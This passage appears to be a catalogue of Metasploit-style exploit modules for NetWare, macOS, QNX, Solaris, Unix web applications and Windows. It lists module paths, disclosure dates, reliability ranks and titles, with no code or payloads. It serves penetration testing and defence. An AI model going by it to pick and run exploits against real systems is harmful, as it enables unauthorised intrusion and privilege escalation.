NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow - netware/sunrpc/pkernel_callit 2009-09-30 good No NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow - osx/afp/loginext 2004-05-03 average No AppleFileServer LoginExt PathName Overflow - osx/arkeia/type77 2005-02-18 average Yes Arkeia Backup Client Type 77 Overflow (Mac OS X) - osx/browser/mozilla_mchannel 2011-05-10 normal No Mozilla Firefox 3.6.16 mChannel Use-After-Free - osx/browser/safari_file_policy 2011-10-12 normal No Apple Safari file:// Arbitrary Code Execution - osx/browser/safari_metadata_archive 2006-02-21 excellent No Safari Archive Metadata Command Execution - osx/browser/safari_proxy_object_type_confusion 2018-03-15 manual No Safari Proxy Object Type Confusion - osx/browser/safari_user_assisted_applescript_exec 2015-10-16 manual No Safari User-Assisted Applescript Exec Attack - osx/browser/safari_user_assisted_download_launch 2014-03-10 manual No Safari User-Assisted Download and Run Attack - osx/browser/software_update 2007-12-17 excellent No Apple OS X Software Update Command Execution - osx/email/mailapp_image_exec 2006-03-01 manual No Mail.app Image Attachment Command Execution - osx/ftp/webstar_ftp_user 2004-07-13 average No WebSTAR FTP Server USER Overflow - osx/http/evocam_webserver 2010-06-01 average No MacOS X EvoCam HTTP GET Buffer Overflow - osx/local/dyld_print_to_file_root 2015-07-21 great Yes Apple OS X DYLD_PRINT_TO_FILE Privilege Escalation - osx/local/iokit_keyboard_root 2014-09-24 manual Yes Mac OS X IOKit Keyboard Driver Root Privilege Escalation - osx/local/libxpc_mitm_ssudo 2018-03-15 excellent Yes Mac OS X libxpc MITM Privilege Escalation - osx/local/nfs_mount_root 2014-04-11 normal Yes Mac OS X NFS Mount Privilege Escalation Exploit - osx/local/persistence 2012-04-01 excellent No Mac OS X Persistent Payload Installer - osx/local/root_no_password 2017-11-29 excellent No Mac OS X Root Privilege Escalation - osx/local/rootpipe 2015-04-09 great Yes Apple OS X Rootpipe Privilege Escalation - osx/local/rootpipe_entitlements 2015-07-01 great Yes Apple OS X Entitlements Rootpipe Privilege Escalation - osx/local/rsh_libmalloc 2015-10-01 normal No Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation - osx/local/setuid_tunnelblick 2012-08-11 excellent Yes Setuid Tunnelblick Privilege Escalation - osx/local/setuid_viscosity 2012-08-12 excellent Yes Viscosity setuid-set ViscosityHelper Privilege Escalation - osx/local/sudo_password_bypass 2013-02-28 normal Yes Mac OS X Sudo Password Bypass - osx/local/tpwn 2015-08-16 normal Yes Mac OS X "tpwn" Privilege Escalation - osx/local/vmware_bash_function_root 2014-09-24 normal Yes OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock) - osx/mdns/upnp_location 2007-05-25 average Yes Mac OS X mDNSResponder UPnP Location Overflow - osx/misc/ufo_ai 2009-10-28 average No UFO: Alien Invasion IRC Client Buffer Overflow - osx/rtsp/quicktime_rtsp_content_type 2007-11-23 average No MacOS X QuickTime RTSP Content-Type Overflow - osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow - osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC) - qnx/local/ifwatchd_priv_esc 2014-03-10 excellent Yes ifwatchd Privilege Escalation - qnx/qconn/qconn_exec 2012-09-04 excellent Yes QNX qconn Command Execution - solaris/dtspcd/heap_noir 2002-07-10 great Yes Solaris dtspcd Heap Overflow - solaris/local/extremeparr_dtappgather_priv_esc 2017-04-24 excellent Yes Solaris 'EXTREMEPARR' dtappgather Privilege Escalation - solaris/local/libnspr_nspr_log_file_priv_esc 2006-10-11 excellent Yes Solaris libnspr NSPR_LOG_FILE Privilege Escalation - solaris/local/rsh_stack_clash_priv_esc 2017-06-19 good Yes Solaris RSH Stack Clash Privilege Escalation - solaris/lpd/sendmail_exec 2001-08-31 excellent No Solaris LPD Command Execution - solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow - solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC) - solaris/sunrpc/sadmind_adm_build_path 2008-10-14 great No Sun Solaris sadmind adm_build_path() Buffer Overflow - solaris/sunrpc/sadmind_exec 2003-09-13 excellent No Solaris sadmind Command Execution - solaris/sunrpc/ypupdated_exec 1994-12-12 excellent No Solaris ypupdated Command Execution - solaris/telnet/fuser 2007-02-12 excellent No Sun Solaris Telnet Remote Authentication Bypass Vulnerability - solaris/telnet/ttyprompt 2002-01-18 excellent No Solaris in.telnetd TTYPROMPT Buffer Overflow - unix/dhcp/bash_environment 2014-09-24 excellent No Dhclient Bash Environment Variable Injection (Shellshock) - unix/dhcp/rhel_dhcp_client_command_injection 2018-05-15 excellent No DHCP Client Command Injection (DynoRoot) - unix/fileformat/ghostscript_type_confusion 2017-04-27 excellent No Ghostscript Type Confusion Arbitrary Command Execution - unix/fileformat/imagemagick_delegate 2016-05-03 excellent No ImageMagick Delegate Arbitrary Command Execution - unix/ftp/proftpd_133c_backdoor 2010-12-02 excellent No ProFTPD-1.3.3c Backdoor Command Execution - unix/ftp/proftpd_modcopy_exec 2015-04-22 excellent Yes ProFTPD 1.3.5 Mod_Copy Command Execution - unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution - unix/http/contentkeeperweb_mimencode 2009-02-25 excellent Yes ContentKeeper Web Remote Command Execution - unix/http/ctek_skyrouter 2011-09-08 average No CTEK SkyRouter 4200 and 4300 Command Execution - unix/http/dell_kace_k1000_upload 2014-03-07 excellent Yes Dell KACE K1000 File Upload - unix/http/epmp1000_get_chart_cmd_shell 2017-12-18 excellent Yes Cambium ePMP1000 'get_chart' Shell via Command Injection (v3.1-3.5-RC7) - unix/http/epmp1000_ping_cmd_shell 2015-11-28 excellent Yes Cambium ePMP1000 'ping' Shell via Command Injection (up to v2.5) - unix/http/freepbx_callmenum 2012-03-20 manual No FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution - unix/http/lifesize_room 2011-07-13 excellent No LifeSize Room Command Injection - unix/http/pfsense_clickjacking 2017-11-21 normal No Clickjacking Vulnerability In CSRF Error Page pfSense - unix/http/pfsense_graph_injection_exec 2016-04-18 excellent No pfSense authenticated graph status RCE - unix/http/pfsense_group_member_exec 2017-11-06 excellent Yes pfSense authenticated group member RCE - unix/http/quest_kace_systems_management_rce 2018-05-31 excellent Yes Quest KACE Systems Management Command Injection - unix/http/tnftp_savefile 2014-10-28 excellent No tnftp "savefile" Arbitrary Command Execution - unix/http/twiki_debug_plugins 2014-10-09 excellent Yes TWiki Debugenableplugins Remote Code Execution - unix/http/vmturbo_vmtadmin_exec_noauth 2014-06-25 excellent Yes VMTurbo Operations Manager vmtadmin.cgi Remote Command Execution - unix/http/xdebug_unauth_exec 2017-09-17 excellent Yes xdebug Unauthenticated OS Command Execution - unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution - unix/local/at_persistence 1997-01-01 excellent Yes at(1) Persistence - unix/local/chkrootkit 2014-06-04 manual Yes Chkrootkit Local Privilege Escalation - unix/local/emacs_movemail 1986-08-01 excellent Yes Emacs movemail Privilege Escalation - unix/local/exim_perl_startup 2016-03-10 excellent Yes Exim "perl_startup" Privilege Escalation - unix/local/netbsd_mail_local 2016-07-07 excellent No NetBSD mail.local Privilege Escalation - unix/local/setuid_nmap 2012-07-19 excellent Yes Setuid Nmap Exploit - unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution - unix/misc/polycom_hdx_auth_bypass 2013-01-18 normal Yes Polycom Command Shell Authorization Bypass - unix/misc/polycom_hdx_traceroute_exec 2017-11-12 excellent Yes Polycom Shell HDX Series Traceroute Command Execution - unix/misc/qnx_qconn_exec 2012-09-04 excellent Yes QNX qconn Command Execution - unix/misc/spamassassin_exec 2006-06-06 excellent No SpamAssassin spamd Remote Command Execution - unix/misc/xerox_mfp 2012-03-07 good No Xerox Multifunction Printers (MFP) "Patch" DLM Vulnerability - unix/misc/zabbix_agent_exec 2009-09-10 excellent No Zabbix Agent net.tcp.listen Command Injection - unix/polycom_hdx_auth_bypass 2013-01-18 normal Yes Polycom Command Shell Authorization Bypass - unix/smtp/clamav_milter_blackhole 2007-08-24 excellent No ClamAV Milter Blackhole-Mode Remote Code Execution - unix/smtp/exim4_string_format 2010-12-07 excellent No Exim4 string_format Function Heap Buffer Overflow - unix/smtp/morris_sendmail_debug 1988-11-02 average Yes Morris Worm sendmail Debug Mode Shell Escape - unix/smtp/qmail_bash_env_exec 2014-09-24 normal No Qmail SMTP Bash Environment Variable Injection (Shellshock) - unix/sonicwall/sonicwall_xmlrpc_rce 2016-07-22 excellent Yes SonicWall Global Management System XMLRPC - set_time_zone Unath RCE - unix/ssh/array_vxag_vapv_privkey_privesc 2014-02-03 excellent No Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution - unix/ssh/tectia_passwd_changereq 2012-12-01 excellent Yes Tectia SSH USERAUTH Change Request Password Reset Vulnerability - unix/webapp/actualanalyzer_ant_cookie_exec 2014-08-28 excellent Yes ActualAnalyzer 'ant' Cookie Command Execution - unix/webapp/arkeia_upload_exec 2013-09-16 excellent Yes Western Digital Arkeia Remote Code Execution - unix/webapp/awstats_configdir_exec 2005-01-15 excellent Yes AWStats configdir Remote Command Execution - unix/webapp/awstats_migrate_exec 2006-05-04 excellent Yes AWStats migrate Remote Command Execution - unix/webapp/awstatstotals_multisort 2008-08-26 excellent Yes AWStats Totals multisort Remote Command Execution - unix/webapp/barracuda_img_exec 2005-09-01 excellent Yes Barracuda IMG.PL Remote Command Execution - unix/webapp/base_qry_common 2008-06-14 excellent No BASE base_qry_common Remote File Include - unix/webapp/basilic_diff_exec 2012-06-28 excellent Yes Basilic 1.5.14 diff.php Arbitrary Command Execution - unix/webapp/cacti_graphimage_exec 2005-01-15 excellent No Cacti graph_view.php Remote Command Execution - unix/webapp/cakephp_cache_corruption 2010-11-15 excellent No CakePHP Cache Corruption Code Execution - unix/webapp/carberp_backdoor_exec 2013-06-28 great Yes Carberp Web Panel C2 Backdoor Remote PHP Code Execution - unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Yes Citrix Access Gateway Command Execution - unix/webapp/clipbucket_upload_exec 2013-10-04 excellent Yes ClipBucket Remote Code Execution - unix/webapp/coppermine_piceditor 2008-01-30 excellent Yes Coppermine Photo Gallery picEditor.php Command Execution - unix/webapp/datalife_preview_exec 2013-01-28 excellent Yes DataLife Engine preview.php PHP Code Injection - unix/webapp/dogfood_spell_exec 2009-03-03 excellent Yes Dogfood CRM spell.php Remote Command Execution - unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution - unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection - unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution - unix/webapp/egallery_upload_exec 2012-07-08 excellent Yes EGallery PHP File Upload Vulnerability - unix/webapp/flashchat_upload_exec 2013-10-04 excellent Yes FlashChat Arbitrary File Upload - unix/webapp/foswiki_maketext 2012-12-03 excellent Yes Foswiki MAKETEXT Remote Command Execution - unix/webapp/freepbx_config_exec 2014-03-21 excellent Yes FreePBX config.php Remote Code Execution - unix/webapp/generic_exec 1993-11-14 excellent No Generic Web Application Unix Command Execution - unix/webapp/get_simple_cms_upload_exec 2014-01-04 excellent Yes GetSimpleCMS PHP File Upload Vulnerability - unix/webapp/google_proxystylesheet_exec 2005-08-16 excellent Yes Google Appliance ProxyStyleSheet Command Execution - unix/webapp/graphite_pickle_exec 2013-08-20 excellent Yes Graphite Web Unsafe Pickle Handling - unix/webapp/guestbook_ssi_exec 1999-11-05 excellent No Matt Wright guestbook.pl Arbitrary Command Execution - unix/webapp/hastymail_exec 2011-11-22 excellent Yes Hastymail 2.1.1 RC1 Command Injection - unix/webapp/havalite_upload_exec 2013-06-17 excellent Yes Havalite CMS Arbitary File Upload Vulnerability - unix/webapp/horde_unserialize_exec 2013-06-27 excellent Yes Horde Framework Unserialize PHP Code Execution - unix/webapp/hybridauth_install_php_exec 2014-08-04 manual Yes HybridAuth install.php PHP Code Execution - unix/webapp/instantcms_exec 2013-06-26 excellent Yes InstantCMS 1.6 Remote PHP Code Execution - unix/webapp/invision_pboard_unserialize_exec 2012-10-25 excellent Yes Invision IP.Board unserialize() PHP Code Execution - unix/webapp/joomla_akeeba_unserialize 2014-09-29 excellent Yes Joomla Akeeba Kickstart Unserialize Remote Code Execution - unix/webapp/joomla_comfields_sqli_rce 2017-05-17 excellent Yes Joomla Component Fields SQLi Remote Code Execution - unix/webapp/joomla_comjce_imgmanager 2012-08-02 excellent Yes Joomla Component JCE File Upload Remote Code Execution - unix/webapp/joomla_contenthistory_sqli_rce 2015-10-23 excellent Yes Joomla Content History SQLi Remote Code Execution - unix/webapp/joomla_media_upload_exec 2013-08-01 excellent Yes Joomla Media Manager File Upload Vulnerability - unix/webapp/joomla_tinybrowser 2009-07-22 excellent Yes Joomla 1.5.12 TinyBrowser File Upload Code Execution - unix/webapp/jquery_file_upload 2018-10-09 excellent Yes blueimp's jQuery (Arbitrary) File Upload - unix/webapp/kimai_sqli 2013-05-21 average Yes Kimai v0.9.2 'db_restore.php' SQL Injection - unix/webapp/libretto_upload_exec 2013-06-14 excellent Yes LibrettoCMS File Manager Arbitary File Upload Vulnerability - unix/webapp/maarch_letterbox_file_upload 2015-02-11 excellent Yes Maarch LetterBox Unrestricted File Upload - unix/webapp/mambo_cache_lite 2008-06-14 excellent No Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include - unix/webapp/mitel_awc_exec 2010-12-12 excellent No Mitel Audio and Web Conferencing Command Injection - unix/webapp/moinmoin_twikidraw 2012-12-30 manual Yes MoinMoin twikidraw Action Traversal File Upload - unix/webapp/mybb_backdoor 2011-10-06 excellent Yes myBB 1.6.4 Backdoor Arbitrary Command Execution - unix/webapp/nagios3_history_cgi 2012-12-09 great Yes Nagios3 history.cgi Host Command Execution - unix/webapp/nagios3_statuswml_ping 2009-06-22 excellent No Nagios3 statuswml.cgi Ping Command Execution - unix/webapp/nagios_graph_explorer 2012-11-30 excellent Yes Nagios XI Network Monitor Graph Explorer Component Command Injection - unix/webapp/narcissus_backend_exec 2012-11-14 excellent Yes Narcissus Image Configuration Passthru Vulnerability - unix/webapp/open_flash_chart_upload_exec 2009-12-14 great Yes Open Flash Chart v2 Arbitrary File Upload - unix/webapp/openemr_sqli_privesc_upload 2013-09-16 excellent Yes OpenEMR 4.1.1 Patch 14 SQLi Privilege Escalation Remote Code Execution - unix/webapp/openemr_upload_exec 2013-02-13 excellent Yes OpenEMR PHP File Upload Vulnerability - unix/webapp/opensis_modname_exec 2012-12-04 excellent Yes OpenSIS 'modname' PHP Code Execution - unix/webapp/openview_connectednodes_exec 2005-08-25 excellent No HP Openview connectedNodes.ovpl Remote Command Execution - unix/webapp/openx_banner_edit 2009-11-24 excellent Yes OpenX banner-edit.php File Upload PHP Code Execution - unix/webapp/oracle_vm_agent_utl 2010-10-12 excellent Yes Oracle VM Server Virtual Server Agent Command Injection - unix/webapp/oscommerce_filemanager 2009-08-31 excellent No osCommerce 2.2 Arbitrary PHP Code Execution - unix/webapp/pajax_remote_exec 2006-03-30 excellent No PAJAX Remote Command Execution - unix/webapp/php_charts_exec 2013-01-16 excellent Yes PHP-Charts v1.0 PHP Code Execution Vulnerability - unix/webapp/php_eval 2008-10-13 manual Yes Generic PHP Code Evaluation - unix/webapp/php_include 2006-12-17 normal Yes PHP Remote File Include Generic Code Execution - unix/webapp/php_vbulletin_template 2005-02-25 excellent Yes vBulletin misc.php Template Name Arbitrary Code Execution - unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution - unix/webapp/phpbb_highlight 2004-11-12 excellent No phpBB viewtopic.php Arbitrary Code Execution - unix/webapp/phpcollab_upload_exec 2017-09-29 excellent Yes phpCollab 2.5.1 Unauthenticated File Upload - unix/webapp/phpmyadmin_config 2009-03-24 excellent No PhpMyAdmin Config File Code Injection - unix/webapp/piwik_superuser_plugin_upload 2017-02-05 excellent No Piwik Superuser Plugin Upload - unix/webapp/projectpier_upload_exec 2012-10-08 excellent Yes Project Pier Arbitrary File Upload Vulnerability - unix/webapp/projectsend_upload_exec 2014-12-02 excellent Yes ProjectSend Arbitrary File Upload - unix/webapp/qtss_parse_xml_exec 2003-02-24 excellent No QuickTime Streaming Server parse_xml.cgi Remote Execution - unix/webapp/redmine_scm_exec 2010-12-19 excellent No Redmine SCM Repository Arbitrary Command Execution - unix/webapp/seportal_sqli_exec 2014-03-20 excellent Yes SePortal SQLi Remote Code Execution - unix/webapp/simple_e_document_upload_exec 2014-01-23 excellent Yes Simple E-Document Arbitrary File Upload - unix/webapp/sixapart_movabletype_storable_exec 2015-02-11 good Yes SixApart MovableType Storable Perl Code Execution - unix/webapp/skybluecanvas_exec 2014-01-28 excellent Yes SkyBlueCanvas CMS Remote Code Execution - unix/webapp/sphpblog_file_upload 2005-08-25 excellent Yes Simple PHP Blog Remote Command Execution - unix/webapp/spip_connect_exec 2012-07-04 excellent Yes SPIP connect Parameter PHP Injection - unix/webapp/squash_yaml_exec 2013-08-06 excellent Yes Squash YAML Code Execution - unix/webapp/squirrelmail_pgp_plugin 2007-07-09 manual No SquirrelMail PGP Plugin Command Execution (SMTP) - unix/webapp/sugarcrm_rest_unserialize_exec 2016-06-23 excellent No SugarCRM REST Unserialize PHP Code Execution - unix/webapp/sugarcrm_unserialize_exec 2012-06-23 excellent No SugarCRM unserialize() PHP Code Execution - unix/webapp/tikiwiki_graph_formula_exec 2007-10-10 excellent Yes TikiWiki tiki-graph_formula Remote PHP Code Execution - unix/webapp/tikiwiki_jhot_exec 2006-09-02 excellent Yes TikiWiki jhot Remote Command Execution - unix/webapp/tikiwiki_unserialize_exec 2012-07-04 excellent No Tiki Wiki unserialize() PHP Code Execution - unix/webapp/tikiwiki_upload_exec 2016-07-11 excellent Yes Tiki Wiki Unauthenticated File Upload Vulnerability - unix/webapp/trixbox_langchoice 2008-07-09 manual Yes Trixbox langChoice PHP Local File Inclusion - unix/webapp/tuleap_rest_unserialize_exec 2017-10-23 excellent Yes Tuleap 9.6 Second-Order PHP Object Injection - unix/webapp/tuleap_unserialize_exec 2014-11-27 excellent Yes Tuleap PHP Unserialize Code Execution - unix/webapp/twiki_history 2005-09-14 excellent Yes TWiki History TWikiUsers rev Parameter Command Execution - unix/webapp/twiki_maketext 2012-12-15 excellent Yes TWiki MAKETEXT Remote Command Execution - unix/webapp/twiki_search 2004-10-01 excellent Yes TWiki Search Function Arbitrary Command Execution - unix/webapp/vbulletin_vote_sqli_exec 2013-03-25 excellent Yes vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection - unix/webapp/vicidial_manager_send_cmd_exec 2013-10-23 excellent Yes VICIdial Manager Send OS Command Injection - unix/webapp/vicidial_user_authorization_unauth_cmd_exec 2017-05-26 excellent Yes VICIdial user_authorization Unauthenticated Command Execution - unix/webapp/webmin_show_cgi_exec 2012-09-06 excellent Yes Webmin /file/show.cgi Remote Command Execution - unix/webapp/webtester_exec 2013-10-17 excellent Yes WebTester 5.x Command Execution - unix/webapp/wp_admin_shell_upload 2015-02-21 excellent Yes WordPress Admin Shell Upload - unix/webapp/wp_advanced_custom_fields_exec 2012-11-14 excellent Yes WordPress Plugin Advanced Custom Fields Remote File Inclusion - unix/webapp/wp_ajax_load_more_file_upload 2015-10-10 excellent Yes Wordpress Ajax Load More PHP Upload Vulnerability - unix/webapp/wp_asset_manager_upload_exec 2012-05-26 excellent Yes WordPress Asset-Manager PHP File Upload Vulnerability - unix/webapp/wp_creativecontactform_file_upload 2014-10-22 excellent Yes Wordpress Creative Contact Form Upload Vulnerability - unix/webapp/wp_downloadmanager_upload 2014-12-03 excellent Yes Wordpress Download Manager (download-manager) Unauthenticated File Upload - unix/webapp/wp_easycart_unrestricted_file_upload 2015-01-08 excellent No WordPress WP EasyCart Unrestricted File Upload - unix/webapp/wp_foxypress_upload 2012-06-05 excellent Yes WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution - unix/webapp/wp_frontend_editor_file_upload 2012-07-04 excellent Yes Wordpress Front-end Editor File Upload - unix/webapp/wp_google_document_embedder_exec 2013-01-03 normal Yes WordPress Plugin Google Document Embedder Arbitrary File Disclosure - unix/webapp/wp_holding_pattern_file_upload 2015-02-11 excellent Yes WordPress Holding Pattern Theme Arbitrary File Upload - unix/webapp/wp_inboundio_marketing_file_upload 2015-03-24 excellent Yes Wordpress InBoundio Marketing PHP Upload Vulnerability - unix/webapp/wp_infusionsoft_upload 2014-09-25 excellent Yes Wordpress InfusionSoft Upload Vulnerability - unix/webapp/wp_lastpost_exec 2005-08-09 excellent No WordPress cache_lastpostdate Arbitrary Code Execution - unix/webapp/wp_mobile_detector_upload_execute 2016-05-31 excellent Yes WordPress WP Mobile Detector 3.5 Shell Upload - unix/webapp/wp_nmediawebsite_file_upload 2015-04-12 excellent Yes Wordpress N-Media Website Contact Form Upload Vulnerability - unix/webapp/wp_optimizepress_upload 2013-11-29 excellent Yes WordPress OptimizePress Theme File Upload Vulnerability - unix/webapp/wp_photo_gallery_unrestricted_file_upload 2014-11-11 excellent Yes WordPress Photo Gallery Unrestricted File Upload - unix/webapp/wp_phpmailer_host_header 2017-05-03 average Yes WordPress PHPMailer Host Header Command Injection - unix/webapp/wp_pixabay_images_upload 2015-01-19 excellent Yes WordPress Pixabay Images PHP Code Upload - unix/webapp/wp_platform_exec 2015-01-21 excellent No WordPress Platform Theme File Upload Vulnerability - unix/webapp/wp_property_upload_exec 2012-03-26 excellent Yes WordPress WP-Property PHP File Upload Vulnerability - unix/webapp/wp_reflexgallery_file_upload 2012-12-30 excellent Yes Wordpress Reflex Gallery Upload Vulnerability - unix/webapp/wp_revslider_upload_execute 2014-11-26 excellent Yes WordPress RevSlider File Upload and Execute Vulnerability - unix/webapp/wp_slideshowgallery_upload 2014-08-28 excellent Yes Wordpress SlideShow Gallery Authenticated File Upload - unix/webapp/wp_symposium_shell_upload 2014-12-11 excellent Yes WordPress WP Symposium 14.11 Shell Upload - unix/webapp/wp_total_cache_exec 2013-04-17 excellent Yes WordPress W3 Total Cache PHP Code Execution - unix/webapp/wp_worktheflow_upload 2015-03-14 excellent Yes Wordpress Work The Flow Upload Vulnerability - unix/webapp/wp_wpshop_ecommerce_file_upload 2015-03-09 excellent Yes WordPress WPshop eCommerce Arbitrary File Upload Vulnerability - unix/webapp/wp_wptouch_file_upload 2014-07-14 excellent Yes WordPress WPTouch Authenticated File Upload - unix/webapp/wp_wysija_newsletters_upload 2014-07-01 excellent Yes Wordpress MailPoet Newsletters (wysija-newsletters) Unauthenticated File Upload - unix/webapp/xoda_file_upload 2012-08-21 excellent Yes XODA 0.4.5 Arbitrary PHP File Upload Vulnerability - unix/webapp/zeroshell_exec 2013-09-22 excellent Yes ZeroShell Remote Code Execution - unix/webapp/zimbra_lfi 2013-12-06 excellent Yes Zimbra Collaboration Server LFI - unix/webapp/zoneminder_packagecontrol_exec 2013-01-22 excellent Yes ZoneMinder Video Server packageControl Command Execution - unix/webapp/zpanel_username_exec 2013-06-07 excellent Yes ZPanel 10.0.0.2 htpasswd Module Username Command Execution - unix/x11/x11_keyboard_exec 2015-07-10 excellent No X11 Keyboard Command Injection - windows/antivirus/ams_hndlrsvc 2010-07-26 excellent No Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution - windows/antivirus/ams_xfr 2009-04-28 excellent No Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution - windows/antivirus/symantec_endpoint_manager_rce 2014-02-24 excellent Yes Symantec Endpoint Protection Manager /servlet/ConsoleServlet Remote Command Execution - windows/antivirus/symantec_iao 2009-04-28 good No Symantec Alert Management System Intel Alert Originator Service Buffer Overflow - windows/antivirus/symantec_rtvscan 2006-05-24 good No Symantec Remote Management Buffer Overflow - windows/antivirus/symantec_workspace_streaming_exec 2014-05-12 excellent Yes Symantec Workspace Streaming ManagementAgentServer.putFile XMLRPC Request Arbitrary File Upload - windows/antivirus/trendmicro_serverprotect 2007-02-20 good No Trend Micro ServerProtect 5.58 Buffer Overflow - windows/antivirus/trendmicro_serverprotect_createbinding 2007-05-07 good No Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow - windows/antivirus/trendmicro_serverprotect_earthagent 2007-05-07 good No Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow - windows/arkeia/type77 2005-02-18 good Yes Arkeia Backup Client Type 77 Overflow (Win32) - windows/backdoor/energizer_duo_payload 2010-03-05 excellent No Energizer DUO USB Battery Charger Arucer.dll Trojan Code Execution - windows/backupexec/name_service 2004-12-16 average No Veritas Backup Exec Name Service Overflow - windows/backupexec/remote_agent 2005-06-22 great Yes Veritas Backup Exec Windows Remote Agent Overflow - windows/backupexec/ssl_uaf 2017-05-10 normal Yes Veritas/Symantec Backup Exec SSL NDMP Connection Use-After-Free - windows/brightstor/ca_arcserve_342 2008-10-09 average No Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow - windows/brightstor/discovery_tcp 2005-02-14 average Yes CA BrightStor Discovery Service TCP Overflow - windows/brightstor/discovery_udp 2004-12-20 average Yes CA BrightStor Discovery Service Stack Buffer Overflow - windows/brightstor/etrust_itm_alert 2008-04-04 average No Computer Associates Alert Notification Buffer Overflow - windows/brightstor/hsmserver 2007-09-27 great No CA BrightStor HSM Buffer Overflow - windows/brightstor/lgserver 2007-01-31 average No CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow - windows/brightstor/lgserver_multi 2007-06-06 average Yes CA BrightStor ARCserve for Laptops and Desktops LGServer Multiple Commands Buffer Overflow - windows/brightstor/lgserver_rxrlogin 2007-06-06 average Yes CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow - windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter 2007-06-06 average Yes CA BrightStor ARCserve for Laptops and Desktops LGServer rxsSetDataGrowthScheduleAndFilter Buffer Overflow - windows/brightstor/lgserver_rxsuselicenseini 2007-06-06 average Yes CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow - windows/brightstor/license_gcr 2005-03-02 average No CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow - windows/brightstor/mediasrv_sunrpc 2007-04-25 average No CA BrightStor ArcServe Media Service Stack Buffer Overflow - windows/brightstor/message_engine 2007-01-11 average No CA BrightStor ARCserve Message Engine Buffer Overflow - windows/brightstor/message_engine_72 2010-10-04 average No CA BrightStor ARCserve Message Engine 0x72 Buffer Overflow - windows/brightstor/message_engine_heap 2006-10-05 average No CA BrightStor ARCserve Message Engine Heap Overflow - windows/brightstor/sql_agent 2005-08-02 average No CA BrightStor Agent for Microsoft SQL Overflow - windows/brightstor/tape_engine 2006-11-21 average No CA BrightStor ARCserve Tape Engine Buffer Overflow - windows/brightstor/tape_engine_0x8a 2010-10-04 average No CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow - windows/brightstor/universal_agent 2005-04-11 average No CA BrightStor Universal Agent Overflow - windows/browser/adobe_cooltype_sing 2010-09-07 great No Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow - windows/browser/adobe_flash_avm2 2014-02-05 normal No Adobe Flash Player Integer Underflow Remote Code Execution - windows/browser/adobe_flash_casi32_int_overflow 2014-10-14 great No Adobe Flash Player casi32 Integer Overflow - windows/browser/adobe_flash_copy_pixels_to_byte_array 2014-09-23 great No Adobe Flash Player copyPixelsToByteArray Method Integer Overflow - windows/browser/adobe_flash_domain_memory_uaf 2014-04-14 great No Adobe Flash Player domainMemory ByteArray Use After Free - windows/browser/adobe_flash_filters_type_confusion 2013-12-10 normal No Adobe Flash Player Type Confusion Remote Code Execution - windows/browser/adobe_flash_mp4_cprt 2012-02-15 normal No Adobe Flash Player MP4 'cprt' Overflow - windows/browser/adobe_flash_otf_font 2012-08-09 normal No Adobe Flash Player 11.3 Kern Table Parsing Integer Overflow - windows/browser/adobe_flash_pcre 2014-11-25 normal No Adobe Flash Player PCRE Regex Vulnerability - windows/browser/adobe_flash_regex_value 2013-02-08 normal No Adobe Flash Player Regular Expression Heap Overflow - windows/browser/adobe_flash_rtmp 2012-05-04 normal No Adobe Flash Player Object Type Confusion - windows/browser/adobe_flash_sps 2011-08-09 normal No Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow - windows/browser/adobe_flash_uncompress_zlib_uninitialized 2014-11-11 good No Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory - windows/browser/adobe_flash_worker_byte_array_uaf 2015-02-02 great No Adobe Flash Player ByteArray With Workers Use After Free - windows/browser/adobe_flashplayer_arrayindexing 2012-06-21 great No Adobe Flash Player AVM Verification Logic Array Indexing Code Execution - windows/browser/adobe_flashplayer_avm 2011-03-15 good No Adobe Flash Player AVM Bytecode Verification Vulnerability - windows/browser/adobe_flashplayer_flash10o 2011-04-11 normal No Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability - windows/browser/adobe_flashplayer_newfunction 2010-06-04 normal No Adobe Flash Player "newfunction" Invalid Pointer Use - windows/browser/adobe_flatedecode_predictor02 2009-10-08 good No Adobe FlateDecode Stream Predictor 02 Integer Overflow - windows/browser/adobe_geticon 2009-03-24 good No Adobe Collab.getIcon() Buffer Overflow - windows/browser/adobe_jbig2decode 2009-02-19 good No Adobe JBIG2Decode Heap Corruption - windows/browser/adobe_media_newplayer 2009-12-14 good No Adobe Doc.media.newPlayer Use After Free Vulnerability - 